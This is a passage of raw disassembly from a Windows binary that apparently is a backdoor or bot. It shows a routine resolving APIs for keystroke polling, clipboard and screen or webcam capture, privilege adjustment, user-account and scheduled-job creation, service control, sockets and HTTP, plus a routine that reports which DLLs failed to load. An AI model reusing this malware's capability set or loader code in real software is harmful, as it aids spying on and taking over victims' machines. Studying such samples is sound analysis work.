; ---------------------------------------------------------------------------
loc_408A3C: ; CODE XREF: sub_40891C+1D�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CAE4, eax
mov dword_43CAE0, 1
loc_408A51: ; CODE XREF: sub_40891C+117�j
; sub_40891C+11E�j
push offset aUser32_dll ; "user32.dll"
call dword_4210C0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_408B66
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_43CA80, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_43CA30, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_43C9C4, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_43CAD4, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_43C9F4, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_43CA14, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_43CA78, eax
call esi ; GetProcAddress
cmp dword_43CA80, ebx
mov dword_43C96C, eax
jz short loc_408B0A
cmp dword_43CA30, ebx
jz short loc_408B0A
cmp dword_43C9C4, ebx
jz short loc_408B0A
cmp dword_43CAD4, ebx
jz short loc_408B0A
cmp dword_43C9F4, ebx
jz short loc_408B0A
cmp dword_43CA14, ebx
jz short loc_408B0A
cmp dword_43CA78, ebx
jz short loc_408B0A
cmp eax, ebx
jnz short loc_408B14
loc_408B0A: ; CODE XREF: sub_40891C+1B8�j
; sub_40891C+1C0�j ...
mov dword_43CAE8, 1
loc_408B14: ; CODE XREF: sub_40891C+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_43C9F0, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_43C904, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_43C9C0, eax
call esi ; GetProcAddress
cmp dword_43C9F0, ebx
mov dword_43C9AC, eax
jz short loc_408B71
cmp dword_43C904, ebx
jz short loc_408B71
cmp dword_43C9C0, ebx
jz short loc_408B71
cmp eax, ebx
jnz short loc_408B7B
jmp short loc_408B71
; ---------------------------------------------------------------------------
loc_408B66: ; CODE XREF: sub_40891C+144�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CAEC, eax
loc_408B71: ; CODE XREF: sub_40891C+232�j
; sub_40891C+23A�j ...
mov dword_43CAE8, 1
loc_408B7B: ; CODE XREF: sub_40891C+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_408D16
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_43CA94, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_43C9D8, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_43CA48, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_43C930, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_43C990, eax
call esi ; GetProcAddress
cmp dword_43CA94, ebx
mov dword_43CA00, eax
jz short loc_408C06
cmp dword_43C9D8, ebx
jz short loc_408C06
cmp dword_43CA48, ebx
jz short loc_408C06
cmp dword_43C930, ebx
jz short loc_408C06
cmp dword_43C990, ebx
jz short loc_408C06
cmp eax, ebx
jnz short loc_408C10
loc_408C06: ; CODE XREF: sub_40891C+2C4�j
; sub_40891C+2CC�j ...
mov dword_43CAF0, 1
loc_408C10: ; CODE XREF: sub_40891C+2E8�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_43CA08, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_43C9E0, eax
call esi ; GetProcAddress
cmp dword_43CA08, ebx
mov dword_43CA90, eax
jz short loc_408C4B
cmp dword_43C9E0, ebx
jz short loc_408C4B
cmp eax, ebx
jnz short loc_408C55
loc_408C4B: ; CODE XREF: sub_40891C+321�j
; sub_40891C+329�j
mov dword_43CAF0, 1
loc_408C55: ; CODE XREF: sub_40891C+32D�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_43CA18, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_43C90C, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_43C914, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_43C974, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_43C978, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_43C928, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_43C9E4, eax
call esi ; GetProcAddress
cmp dword_43CA18, ebx
mov dword_43C918, eax
jz short loc_408CF9
cmp dword_43C90C, ebx
jz short loc_408CF9
cmp dword_43C914, ebx
jz short loc_408CF9
cmp dword_43C974, ebx
jz short loc_408CF9
cmp dword_43C978, ebx
jz short loc_408CF9
cmp dword_43C928, ebx
jz short loc_408CF9
cmp dword_43C9E4, ebx
jz short loc_408CF9
cmp eax, ebx
jnz short loc_408D03
loc_408CF9: ; CODE XREF: sub_40891C+3A7�j
; sub_40891C+3AF�j ...
mov dword_43CAF0, 1
loc_408D03: ; CODE XREF: sub_40891C+3DB�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43C910, eax
jnz short loc_408D2B
jmp short loc_408D21
; ---------------------------------------------------------------------------
loc_408D16: ; CODE XREF: sub_40891C+26A�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CAF4, eax
loc_408D21: ; CODE XREF: sub_40891C+3F8�j
mov dword_43CAF0, 1
loc_408D2B: ; CODE XREF: sub_40891C+3F6�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_408DF7
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_43CA10, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_43CA68, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_43CA70, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_43CA2C, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_43C954, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_43C900, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_43CA6C, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_43C8EC, eax
call esi ; GetProcAddress
cmp dword_43CA10, ebx
mov dword_43C988, eax
jz short loc_408E02
cmp dword_43CA68, ebx
jz short loc_408E02
cmp dword_43CA70, ebx
jz short loc_408E02
cmp dword_43CA2C, ebx
jz short loc_408E02
cmp dword_43C954, ebx
jz short loc_408E02
cmp dword_43C900, ebx
jz short loc_408E02
cmp dword_43CA6C, ebx
jz short loc_408E02
cmp dword_43C8EC, ebx
jz short loc_408E02
cmp eax, ebx
jnz short loc_408E0C
jmp short loc_408E02
; ---------------------------------------------------------------------------
loc_408DF7: ; CODE XREF: sub_40891C+41A�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CAFC, eax
loc_408E02: ; CODE XREF: sub_40891C+49B�j
; sub_40891C+4A3�j ...
mov dword_43CAF8, 1
loc_408E0C: ; CODE XREF: sub_40891C+4D7�j
mov ebp, dword_4210C0
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4090C8
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_43C99C, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_43CAC8, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_43C940, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_43C91C, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_43C9D0, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_43C9B8, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_43C984, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_43CAA4, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_43CAC0, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_43C9CC, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_43CAB0, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_43CA64, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_43CA24, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_43CA20, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_43C960, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_43C958, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_43CA74, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_43CA88, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_43CA3C, eax
call esi ; GetProcAddress
mov dword_43C9FC, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_43CA50, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_43CA0C, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_43CA4C, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_43CAB8, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_43CA04, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_43C9C8, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_43CA38, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_43CAA8, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_43C9DC, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_43C980, eax
call esi ; GetProcAddress
cmp dword_43C99C, ebx
mov dword_43CABC, eax
jz loc_4090D3
cmp dword_43CAC8, ebx
jz loc_4090D3
cmp dword_43C940, ebx
jz loc_4090D3
cmp dword_43C9D0, ebx
jz loc_4090D3
cmp dword_43C9B8, ebx
jz loc_4090D3
cmp dword_43C984, ebx
jz loc_4090D3
cmp dword_43CAA4, ebx
jz loc_4090D3
cmp dword_43CAC0, ebx
jz loc_4090D3
cmp dword_43C9CC, ebx
jz loc_4090D3
cmp dword_43CAB0, ebx
jz loc_4090D3
cmp dword_43CA64, ebx
jz loc_4090D3
cmp dword_43CA24, ebx
jz loc_4090D3
cmp dword_43CA20, ebx
jz loc_4090D3
cmp dword_43C960, ebx
jz short loc_4090D3
cmp dword_43CA74, ebx
jz short loc_4090D3
cmp dword_43CA88, ebx
jz short loc_4090D3
cmp dword_43CA3C, ebx
jz short loc_4090D3
cmp dword_43C9FC, ebx
jz short loc_4090D3
cmp dword_43CA50, ebx
jz short loc_4090D3
cmp dword_43CA0C, ebx
jz short loc_4090D3
cmp dword_43CA4C, ebx
jz short loc_4090D3
cmp dword_43CAB8, ebx
jz short loc_4090D3
cmp dword_43CA04, ebx
jz short loc_4090D3
cmp dword_43C9C8, ebx
jz short loc_4090D3
cmp dword_43CA38, ebx
jz short loc_4090D3
cmp dword_43CAA8, ebx
jz short loc_4090D3
cmp dword_43C9DC, ebx
jz short loc_4090D3
cmp eax, ebx
jnz short loc_4090DD
jmp short loc_4090D3
; ---------------------------------------------------------------------------
loc_4090C8: ; CODE XREF: sub_40891C+501�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB04, eax
loc_4090D3: ; CODE XREF: sub_40891C+6A0�j
; sub_40891C+6AC�j ...
mov dword_43CB00, 1
loc_4090DD: ; CODE XREF: sub_40891C+7A8�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_4091E2
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_43C968, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_43C8F4, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_43C9EC, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_43C9A0, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_43C9F8, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_43C9BC, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_43C934, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_43C92C, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_43C93C, eax
call esi ; GetProcAddress
cmp dword_43C968, ebx
mov ecx, dword_43C9BC
mov dword_43CA58, eax
jz short loc_4091BE
cmp dword_43C8F4, ebx
jz short loc_4091BE
cmp dword_43C9EC, ebx
jz short loc_4091BE
cmp dword_43C9A0, ebx
jz short loc_4091BE
cmp dword_43C9F8, ebx
jz short loc_4091BE
cmp ecx, ebx
jz short loc_4091BE
cmp dword_43C934, ebx
jz short loc_4091BE
cmp dword_43C92C, ebx
jz short loc_4091BE
cmp dword_43C93C, ebx
jz short loc_4091BE
cmp eax, ebx
jnz short loc_4091C8
loc_4091BE: ; CODE XREF: sub_40891C+860�j
; sub_40891C+868�j ...
mov dword_43CB08, 1
loc_4091C8: ; CODE XREF: sub_40891C+8A0�j
cmp ecx, ebx
jz short loc_4091FD
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_43C9D4, eax
jnz short loc_4091FD
jmp short loc_4091F7
; ---------------------------------------------------------------------------
loc_4091E2: ; CODE XREF: sub_40891C+7CC�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB0C, eax
mov dword_43CB08, 1
loc_4091F7: ; CODE XREF: sub_40891C+8C4�j
mov dword_43C9D4, ebx
loc_4091FD: ; CODE XREF: sub_40891C+8AE�j
; sub_40891C+8C2�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_409247
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_43C9B0, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_43CAD8, eax
call esi ; GetProcAddress
cmp dword_43C9B0, ebx
mov dword_43C948, eax
jz short loc_409252
cmp dword_43CAD8, ebx
jz short loc_409252
cmp eax, ebx
jnz short loc_40925C
jmp short loc_409252
; ---------------------------------------------------------------------------
loc_409247: ; CODE XREF: sub_40891C+8EC�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB14, eax
loc_409252: ; CODE XREF: sub_40891C+91B�j
; sub_40891C+923�j ...
mov dword_43CB10, 1
loc_40925C: ; CODE XREF: sub_40891C+927�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_409352
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_43C924, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_43C8FC, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_43C970, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_43C9A4, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_43CAB4, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_43C95C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_43C908, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_43C8F8, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_43C98C, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_43CA7C, eax
call esi ; GetProcAddress
cmp dword_43C924, ebx
mov dword_43CA34, eax
jz short loc_40935D
cmp dword_43C8FC, ebx
jz short loc_40935D
cmp dword_43C970, ebx
jz short loc_40935D
cmp dword_43C9A4, ebx
jz short loc_40935D
cmp dword_43CAB4, ebx
jz short loc_40935D
cmp dword_43C95C, ebx
jz short loc_40935D
cmp dword_43C908, ebx
jz short loc_40935D
cmp dword_43C8F8, ebx
jz short loc_40935D
cmp dword_43C98C, ebx
jz short loc_40935D
cmp dword_43CA7C, ebx
jz short loc_40935D
cmp eax, ebx
jnz short loc_409367
jmp short loc_40935D
; ---------------------------------------------------------------------------
loc_409352: ; CODE XREF: sub_40891C+94B�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB1C, eax
loc_40935D: ; CODE XREF: sub_40891C+9E6�j
; sub_40891C+9EE�j ...
mov dword_43CB18, 1
loc_409367: ; CODE XREF: sub_40891C+A32�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40939C
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_43C94C, eax
call esi ; GetProcAddress
cmp dword_43C94C, ebx
mov dword_43CA1C, eax
jz short loc_4093A7
cmp eax, ebx
jnz short loc_4093B1
jmp short loc_4093A7
; ---------------------------------------------------------------------------
loc_40939C: ; CODE XREF: sub_40891C+A56�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB24, eax
loc_4093A7: ; CODE XREF: sub_40891C+A78�j
; sub_40891C+A7E�j
mov dword_43CB20, 1
loc_4093B1: ; CODE XREF: sub_40891C+A7C�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4093E6
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_43CAA0, eax
call esi ; GetProcAddress
cmp dword_43CAA0, ebx
mov dword_43CA9C, eax
jz short loc_4093F1
cmp eax, ebx
jnz short loc_4093FB
jmp short loc_4093F1
; ---------------------------------------------------------------------------
loc_4093E6: ; CODE XREF: sub_40891C+AA0�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB2C, eax
loc_4093F1: ; CODE XREF: sub_40891C+AC2�j
; sub_40891C+AC8�j
mov dword_43CB28, 1
loc_4093FB: ; CODE XREF: sub_40891C+AC6�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40945A
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_43CACC, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_43CAC4, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_43CA8C, eax
call esi ; GetProcAddress
cmp dword_43CACC, ebx
mov dword_43C964, eax
jz short loc_409465
cmp dword_43CAC4, ebx
jz short loc_409465
cmp dword_43CA8C, ebx
jz short loc_409465
cmp eax, ebx
jnz short loc_40946F
jmp short loc_409465
; ---------------------------------------------------------------------------
loc_40945A: ; CODE XREF: sub_40891C+AEA�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB34, eax
loc_409465: ; CODE XREF: sub_40891C+B26�j
; sub_40891C+B2E�j ...
mov dword_43CB30, 1
loc_40946F: ; CODE XREF: sub_40891C+B3A�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4094A4
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_43C998, eax
call esi ; GetProcAddress
cmp dword_43C998, ebx
mov dword_43CA98, eax
jz short loc_4094AF
cmp eax, ebx
jnz short loc_4094B9
jmp short loc_4094AF
; ---------------------------------------------------------------------------
loc_4094A4: ; CODE XREF: sub_40891C+B5E�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB3C, eax
loc_4094AF: ; CODE XREF: sub_40891C+B80�j
; sub_40891C+B86�j
mov dword_43CB38, 1
loc_4094B9: ; CODE XREF: sub_40891C+B84�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_409542
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_43CA60, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_43CAAC, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_43C9E8, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_43C9A8, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_43CA40, eax
call esi ; GetProcAddress
cmp dword_43CA60, ebx
mov dword_43C9B4, eax
jz short loc_40954D
cmp dword_43CAAC, ebx
jz short loc_40954D
cmp dword_43C9E8, ebx
jz short loc_40954D
cmp dword_43C9A8, ebx
jz short loc_40954D
cmp dword_43CA40, ebx
jz short loc_40954D
cmp eax, ebx
jnz short loc_409557
jmp short loc_40954D
; ---------------------------------------------------------------------------
loc_409542: ; CODE XREF: sub_40891C+BA8�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB44, eax
loc_40954D: ; CODE XREF: sub_40891C+BFE�j
; sub_40891C+C06�j ...
mov dword_43CB40, 1
loc_409557: ; CODE XREF: sub_40891C+C22�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40958C
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_43C97C, eax
call esi ; GetProcAddress
cmp dword_43C97C, ebx
mov dword_43CA54, eax
jz short loc_409597
cmp eax, ebx
jnz short loc_4095A1
jmp short loc_409597
; ---------------------------------------------------------------------------
loc_40958C: ; CODE XREF: sub_40891C+C46�j
call dword_421088 ; RtlGetLastWin32Error
mov dword_43CB4C, eax
loc_409597: ; CODE XREF: sub_40891C+C68�j
; sub_40891C+C6E�j
mov dword_43CB48, 1
loc_4095A1: ; CODE XREF: sub_40891C+C6C�j
pop edi
xor eax, eax
pop esi
pop ebp
inc eax
pop ebx
retn
sub_40891C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095A9 proc near ; CODE XREF: sub_40CD3A+51A1�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_43CAE0, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_4095F1
push dword_43CAE4
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_4095F1: ; CODE XREF: sub_4095A9+1A�j
cmp dword_43CAE8, esi
jz short loc_409625
push dword_43CAEC
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_409625: ; CODE XREF: sub_4095A9+4E�j
cmp dword_43CAF0, esi
jz short loc_409659
push dword_43CAF4
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_409659: ; CODE XREF: sub_4095A9+82�j
cmp dword_43CAF8, esi
jz short loc_40968D
push dword_43CAFC
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_40968D: ; CODE XREF: sub_4095A9+B6�j
cmp dword_43CB00, esi
jz short loc_4096C1
push dword_43CB04
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_4096C1: ; CODE XREF: sub_4095A9+EA�j
cmp dword_43CB08, esi
jz short loc_4096F5
push dword_43CB0C
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_4096F5: ; CODE XREF: sub_4095A9+11E�j
cmp dword_43CB10, esi
jz short loc_409729
push dword_43CB14
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_409729: ; CODE XREF: sub_4095A9+152�j
cmp dword_43CB18, esi
jz short loc_40975D
push dword_43CB1C
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_40975D: ; CODE XREF: sub_4095A9+186�j
cmp dword_43CB20, esi
jz short loc_409791
push dword_43CB24
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_409791: ; CODE XREF: sub_4095A9+1BA�j
cmp dword_43CB28, esi
jz short loc_4097C5
push dword_43CB2C
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_4097C5: ; CODE XREF: sub_4095A9+1EE�j
cmp dword_43CB30, esi
jz short loc_4097F9
push dword_43CB34
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
loc_4097F9: ; CODE XREF: sub_4095A9+222�j
cmp dword_43CB38, esi
jz short loc_40982D
push dword_43CB3C
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_415316
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_412BD1
add esp, 20h
